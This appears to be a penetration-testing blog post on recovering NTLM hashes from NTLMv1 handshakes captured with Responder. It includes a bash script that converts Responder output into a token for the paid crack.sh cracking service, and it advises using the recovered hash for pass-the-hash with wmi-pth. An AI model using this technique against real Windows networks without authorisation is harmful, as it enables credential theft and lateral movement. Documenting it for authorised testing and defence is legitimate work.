Cracking NTLMv1 Handshakes with Crack.sh
What
This post will show how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. This technique has been publicized since 2013, but is often not leveraged by testers.
Intro
For most pentesters, running Responder.py is one of the first tasks performed on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. The next step usually is to then attempt to crack those handshakes, usually at a minimum running them against a wordlist such as crackstation.
A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. Unlike the NTLMv1 handshake, the NTLM hash can be used as a password equivalent in a windows environment.
Required Reading
MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS (https://www.youtube.com/watch?v=sIidzPntdCM).
NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).
How do we exploit this?
You can use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for 20 bucks. The site doesn't take the challenge/response displayed in Responder directly, instead you need to convert it to a token.
The script below can be used to convert the Responder output to a token that will be accepted by crack.sh.
#!/bin/bash
if [ $# -lt 1 ]
then
echo "Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> ..."
exit 1
fi
for i in $@; do
for hash in $( cat $i )
do
user=$(echo $hash | cut -f1 -d:)
domain=$(echo $hash | cut -f3 -d:)
lmresp=$(echo $hash | cut -f4 -d:)
ntresp=$(echo $hash | cut -f5 -d:)
srvchallenge=$(echo $hash | cut -f6 -d:)
# Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html
if [ ${lmresp:16:32} == "00000000000000000000000000000000" ]
then
clientchallenge=${lmresp:0:16}
combinedchallenge=$srvchallenge$clientchallenge
srvchallenge=$( echo $combinedchallenge | xxd -r -p| md5sum -b | cut -c1-16)
fi
echo
echo "user:$user"
echo "domain:$domain"
echo "lmresponse:$lmresp"
echo "ntresp:$ntresp"
echo "challenge:$srvchallenge"
chapcrack=$(locate chapcrack.py | head -1)
if [ -e "$chapcrack" ]
then
$chapcrack radius -R $ntresp -C $srvchallenge
else
echo "chapcrack.py radius -R $ntresp -C $srvchallenge"
fi
done
done
Upload this token to crack.sh, give them 20 bucks, and wait for your NTLM hash.
Another Hash?
Yep, NTLM hashes are password equivalents in a Windows environment. Use a tool like wmi-pth to leverage your newly acquired NTLM hash.